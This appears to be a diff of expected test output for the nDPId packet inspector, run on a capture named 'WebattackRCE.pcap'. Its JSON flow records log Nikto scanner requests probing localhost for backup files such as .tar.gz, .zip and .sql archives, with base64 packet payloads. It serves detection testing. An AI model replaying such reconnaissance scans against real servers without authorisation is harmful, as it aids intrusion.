{"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277253,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":1,"flow_last_seen":1576420277253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277253,"pkt":"AAAAAAAAAAAAAAAACABFAADClhFAAEAGpiJ\/AAABfwAAAcRkH5B3iK6vsi1CtIAYAED+tgAAAQEICp1m\/S2dZv0tR0VUIC8xMjcudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277253,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277253,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277255,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":1,"flow_last_seen":1576420277255,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277255,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/zTlAAEAGbv1\/AAABfwAAAcRmH5BLoPWWHSfpPoAYAED+swAAAQEICp1m\/S+dZv0vR0VUIC8xMjcuZWdnIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277255,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277255,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277258,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":1,"flow_last_seen":1576420277258,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277258,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/W9xAAEAG4Fp\/AAABfwAAAcRoH5D01mN5gVzP14AYAED+swAAAQEICp1m\/TKdZv0yR0VUIC8xMjcuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277258,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277258,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277260,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":1,"flow_last_seen":1576420277260,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277260,"pkt":"AAAAAAAAAAAAAAAACABFAADF4tJAAEAGWV5\/AAABfwAAAcRqH5C3Btp0g+NrSIAYAED+uQAAAQEICp1m\/TSdZv00R0VUIC8xMjdfMF8wXzEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277260,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277260,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277261,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":1,"flow_last_seen":1576420277261,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277261,"pkt":"AAAAAAAAAAAAAAAACABFAADFGk1AAEAGIeR\/AAABfwAAAcRsH5AZ8SLp80IPEIAYAED+uQAAAQEICp1m\/TWdZv01R0VUIC8xMjdfMF8wXzEuemlwIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277261,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277261,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277263,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":1,"flow_last_seen":1576420277263,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277263,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/qndAAEAGkb9\/AAABfwAAAcRuH5AQK5LXaKY1oYAYAED+swAAAQEICp1m\/TadZv02R0VUIC8xMjcuc3FsIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277263,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277263,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277264,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":1,"flow_last_seen":1576420277264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277264,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/DxVAAEAGLSJ\/AAABfwAAAcRwH5D+vze4KlHK9oAYAED+swAAAQEICp1m\/TidZv04R0VUIC8xMjcuc3FsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277264,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277264,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277266,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":1,"flow_last_seen":1576420277266,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277266,"pkt":"AAAAAAAAAAAAAAAACABFAADKoqhAAEAGmYN\/AAABfwAAAcRyH5D4dpoDoX2CwIAYAED+vgAAAQEICp1m\/TqdZv06R0VUIC8xMjdfMF8wXzEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277266,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 